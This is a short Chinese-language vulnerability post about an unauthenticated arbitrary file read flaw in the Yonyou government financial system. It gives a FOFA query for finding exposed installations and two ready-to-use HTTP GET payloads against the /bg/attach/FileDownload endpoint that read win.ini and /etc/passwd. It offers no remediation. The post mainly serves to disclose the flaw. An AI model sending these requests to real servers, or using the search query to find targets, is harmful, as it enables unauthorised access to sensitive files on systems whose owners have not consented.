0x01 产品简介
用友政务财务系统是面向政府部门、事业单位、非赢利组织的全方位业务管理信息化解决方案提供商。该系统具备一系列的功能特点,能够满足不同规模和类型企业的财务管理需求。
0x02 漏洞概述
用友政务财务系统存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞读取服务器任意文件,造成敏感信息泄露。
0x03 测绘语句
测绘语句:fofa: app="用友-政务财务系统"0x04 漏洞复现
payload——windows:GET /bg/attach/FileDownload?execlPath=C://Windows//win.ini HTTP/1.1
payload——linux:GET /bg/attach/FileDownload?execlPath=/etc/passwd HTTP/1.1